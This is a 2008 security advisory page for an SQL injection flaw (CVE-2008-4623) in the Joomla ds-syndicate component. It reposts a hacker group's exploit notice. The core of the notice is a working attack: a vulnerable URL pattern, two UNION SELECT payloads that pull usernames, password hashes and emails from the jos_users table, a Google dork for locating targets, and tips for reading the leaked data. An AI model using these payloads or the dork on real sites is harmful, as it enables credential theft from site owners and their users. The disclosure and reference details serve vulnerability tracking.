Topic : | Joomla Component ds-syndicate (feed_id) SQL Injection Vulnerability
|
SecurityAlert : 4453
CVE : CVE-2008-4623
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : boom3rang
Published : 22.10.2008
Affected Software : | joomla:com_ds-syndicate:1.1.1 |
 Advisory Content : #############################################
#Joomla com_ds-syndicate Sql-injetion vulnerability #
#############################################
#[~] Author : boom3rang
#[~] HomePage: www.khg-crew.ws
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er.
#[~] Kosova Hackers Group
#[!] Component_Name: ds-syndicate
#[!] Script_Name: Joomla
#[!] Google_Dork: inurl:"com_ds-syndicate"
#############################################
#[~] Exp:
http://localhost/Path/index2.php?option=ds-syndicate&version=1&feed_id=[Exp
loit]
#[~] Exploit [1]:
1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,
5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_users--
#[~] Exploit [2]:
1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4
,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
#[!] Note:
If you get some file to download like feed or xml, download that file and
open with some text editor to see informations like username and password,
but first try exploits whithout downloding the file ;).
#############################################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
#############################################
References :
http://securityreason.com/expldownload/1/4954/1 (Exploit)
http://www.milw0rm.com/exploits/6792
http://secunia.com/advisories/32321
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|